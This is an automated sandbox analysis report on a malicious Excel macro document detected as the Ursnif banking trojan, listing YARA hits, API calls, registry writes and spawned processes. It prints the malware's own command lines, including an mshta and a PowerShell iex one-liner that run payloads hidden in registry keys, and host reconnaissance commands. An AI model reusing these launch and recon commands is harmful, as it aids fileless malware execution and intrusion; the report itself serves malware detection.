Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 4_2_02356C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 4_2_02356C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 4_2_02356C29
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
Source: Screenshot number: 4 Screenshot OCR: Enable Content I F122 -',- jR xIs [Compatibility Mode] - Microsoft Excel - xIs [Compatibility Mod
Found Excel 4.0 Macro with suspicious formulas
Source: xls.xls Initial sample: EXEC
Source: xls.xls Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: xls.xls Initial sample: Sheet size: 5210
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\fyjh\zglgy\lckhvmn.drhdh Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png Jump to dropped file
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003CC8CC NtdllDefWindowProc_A,GetCapture, 4_2_003CC8CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A863C NtdllDefWindowProc_A, 4_2_003A863C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003C281C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 4_2_003C281C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9348 NtdllDefWindowProc_A, 4_2_003B9348
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_003B9AF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_003B9BA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004314E8 NtCreateSection,memset, 4_2_004314E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0043183B NtMapViewOfSection, 4_2_0043183B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004322C5 NtQueryVirtualMemory, 4_2_004322C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004772D8 NtMapViewOfSection, 4_2_004772D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00471371 GetProcAddress,NtCreateSection,memset, 4_2_00471371
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00477507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_00477507
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047B2F1 NtQueryVirtualMemory, 4_2_0047B2F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02355AD9 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 4_2_02355AD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02361B30 NtWriteVirtualMemory, 4_2_02361B30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235F0A0 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 4_2_0235F0A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234C088 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 4_2_0234C088
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234BE78 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_0234BE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349E4D NtGetContextThread, 4_2_02349E4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234E64A OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 4_2_0234E64A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02360755 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 4_2_02360755
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235B534 NtQueryInformationProcess, 4_2_0235B534
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235CD06 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 4_2_0235CD06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235FA3B NtQuerySystemInformation,RtlNtStatusToDosError, 4_2_0235FA3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02355348 memset,NtQueryInformationProcess, 4_2_02355348
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234F920 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 4_2_0234F920
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02355903 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_02355903
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_023466A5 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_023466A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02356EDE NtGetContextThread,RtlNtStatusToDosError, 4_2_02356EDE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234CC2C NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_0234CC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_023494BB memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 4_2_023494BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_023534F7 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_023534F7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B7278 NtWriteVirtualMemory, 20_2_028B7278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B20B4 NtQueryInformationProcess, 20_2_028B20B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02897008 NtQueryInformationToken,NtQueryInformationToken, 20_2_02897008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B4064 NtMapViewOfSection, 20_2_028B4064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289EF1C NtSetContextThread,NtUnmapViewOfSection, 20_2_0289EF1C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02895DF4 NtCreateSection, 20_2_02895DF4
Source: C:\Windows\explorer.exe Code function: 28_2_02916A74 NtQuerySystemInformation, 28_2_02916A74
Source: C:\Windows\explorer.exe Code function: 28_2_02927278 NtWriteVirtualMemory, 28_2_02927278
Source: C:\Windows\explorer.exe Code function: 28_2_0290527C NtAllocateVirtualMemory, 28_2_0290527C
Source: C:\Windows\explorer.exe Code function: 28_2_02912FD0 NtQueryInformationProcess, 28_2_02912FD0
Source: C:\Windows\explorer.exe Code function: 28_2_0290EF1C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection, 28_2_0290EF1C
Source: C:\Windows\explorer.exe Code function: 28_2_0291FF54 NtReadVirtualMemory, 28_2_0291FF54
Source: C:\Windows\explorer.exe Code function: 28_2_029014D0 NtQueryInformationProcess, 28_2_029014D0
Source: C:\Windows\explorer.exe Code function: 28_2_02924064 NtMapViewOfSection, 28_2_02924064
Source: C:\Windows\explorer.exe Code function: 28_2_02905DF4 NtCreateSection, 28_2_02905DF4
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235EE34 CreateProcessAsUserW, 4_2_0235EE34
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D8E4C 4_2_003D8E4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003C281C 4_2_003C281C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0039E8EB 4_2_0039E8EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B3840 4_2_003B3840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004320A4 4_2_004320A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047B0CC 4_2_0047B0CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047936B 4_2_0047936B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004723FC 4_2_004723FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00401618 4_2_00401618
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235F395 4_2_0235F395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235404C 4_2_0235404C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_023620D4 4_2_023620D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02366664 4_2_02366664
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_023427ED 4_2_023427ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289EF1C 20_2_0289EF1C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B0CDC 20_2_028B0CDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028A059C 20_2_028A059C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02891AD0 20_2_02891AD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02897A0C 20_2_02897A0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B1A30 20_2_028B1A30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028A537C 20_2_028A537C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02893088 20_2_02893088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028A2080 20_2_028A2080
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289A8B8 20_2_0289A8B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028AA0C4 20_2_028AA0C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B40F8 20_2_028B40F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028958FC 20_2_028958FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B5010 20_2_028B5010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02894828 20_2_02894828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02890000 20_2_02890000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B2994 20_2_028B2994
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028A0134 20_2_028A0134
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02896168 20_2_02896168
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028AE178 20_2_028AE178
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289B170 20_2_0289B170
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028A6E88 20_2_028A6E88
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028AAE94 20_2_028AAE94
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028916B4 20_2_028916B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028966D0 20_2_028966D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B36F4 20_2_028B36F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028A3F2C 20_2_028A3F2C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289CF24 20_2_0289CF24
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289B730 20_2_0289B730
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289D590 20_2_0289D590
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289AD03 20_2_0289AD03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028A8504 20_2_028A8504
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289DD18 20_2_0289DD18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028A3520 20_2_028A3520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028A154C 20_2_028A154C
Source: C:\Windows\explorer.exe Code function: 28_2_0291AE94 28_2_0291AE94
Source: C:\Windows\explorer.exe Code function: 28_2_029016B4 28_2_029016B4
Source: C:\Windows\explorer.exe Code function: 28_2_02907A0C 28_2_02907A0C
Source: C:\Windows\explorer.exe Code function: 28_2_0290EF1C 28_2_0290EF1C
Source: C:\Windows\explorer.exe Code function: 28_2_0291537C 28_2_0291537C
Source: C:\Windows\explorer.exe Code function: 28_2_02912080 28_2_02912080
Source: C:\Windows\explorer.exe Code function: 28_2_0290A8B8 28_2_0290A8B8
Source: C:\Windows\explorer.exe Code function: 28_2_029058FC 28_2_029058FC
Source: C:\Windows\explorer.exe Code function: 28_2_0291E178 28_2_0291E178
Source: C:\Windows\explorer.exe Code function: 28_2_02916E88 28_2_02916E88
Source: C:\Windows\explorer.exe Code function: 28_2_029066D0 28_2_029066D0
Source: C:\Windows\explorer.exe Code function: 28_2_02901AD0 28_2_02901AD0
Source: C:\Windows\explorer.exe Code function: 28_2_029236F4 28_2_029236F4
Source: C:\Windows\explorer.exe Code function: 28_2_02921A30 28_2_02921A30
Source: C:\Windows\explorer.exe Code function: 28_2_0290B730 28_2_0290B730
Source: C:\Windows\explorer.exe Code function: 28_2_0290CF24 28_2_0290CF24
Source: C:\Windows\explorer.exe Code function: 28_2_02913F2C 28_2_02913F2C
Source: C:\Windows\explorer.exe Code function: 28_2_0290BF6C 28_2_0290BF6C
Source: C:\Windows\explorer.exe Code function: 28_2_02903088 28_2_02903088
Source: C:\Windows\explorer.exe Code function: 28_2_02920CDC 28_2_02920CDC
Source: C:\Windows\explorer.exe Code function: 28_2_0291A0C4 28_2_0291A0C4
Source: C:\Windows\explorer.exe Code function: 28_2_029240F8 28_2_029240F8
Source: C:\Windows\explorer.exe Code function: 28_2_02925010 28_2_02925010
Source: C:\Windows\explorer.exe Code function: 28_2_02904828 28_2_02904828
Source: C:\Windows\explorer.exe Code function: 28_2_0291E87C 28_2_0291E87C
Source: C:\Windows\explorer.exe Code function: 28_2_0290D590 28_2_0290D590
Source: C:\Windows\explorer.exe Code function: 28_2_02922994 28_2_02922994
Source: C:\Windows\explorer.exe Code function: 28_2_0291059C 28_2_0291059C
Source: C:\Windows\explorer.exe Code function: 28_2_0290DD18 28_2_0290DD18
Source: C:\Windows\explorer.exe Code function: 28_2_0290AD03 28_2_0290AD03
Source: C:\Windows\explorer.exe Code function: 28_2_02918504 28_2_02918504
Source: C:\Windows\explorer.exe Code function: 28_2_02910134 28_2_02910134
Source: C:\Windows\explorer.exe Code function: 28_2_02913520 28_2_02913520
Source: C:\Windows\explorer.exe Code function: 28_2_0291154C 28_2_0291154C
Source: C:\Windows\explorer.exe Code function: 28_2_0290B170 28_2_0290B170
Source: C:\Windows\explorer.exe Code function: 28_2_02906168 28_2_02906168
Document contains embedded VBA macros
Source: xls.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00386224 appears 61 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00383470 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00383EBC appears 78 times
PE file does not import any functions
Source: vl8o3v8u.dll.24.dr Static PE information: No import functions for PE file found
Source: 8pjpp9kb.dll.22.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Yara signature match
Source: xls.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.phis.bank.troj.spyw.expl.evad.winXLS@63/76@14/4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A0AE8 GetLastError,FormatMessageA, 4_2_003A0AE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003885C8 GetDiskFreeSpaceA, 4_2_003885C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004782EB CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 4_2_004782EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047A12D CoCreateInstance, 4_2_0047A12D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00396AE4 FindResourceA, 4_2_00396AE4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\0FDE0000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{C7880720-7A2F-91F8-BCEB-4E55B04F6259}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{1BDCE616-BEE2-052B-A07F-D209D423264D}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD6AF.tmp Jump to behavior
Source: xls.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorlib.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer
Source: xls.xls Virustotal: Detection: 16%
Source: xls.xls ReversingLabs: Detection: 10%
Source: rundll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: powershell.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2828 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2392 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1340 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2168 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47278A61-FA3B-119B-3C6B-CED530CFE2D9\\\CRPPcapi'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6C1D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC6C1C.tmp'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8BAE.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8BAD.tmp'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\29B8.bi1'
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\29B8.bi1'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'ipconfig /all >> C:\Users\user\AppData\Local\Temp\B55E.bin1'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user\AppData\Local\Temp\A8F1.bin1'
Source: unknown Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
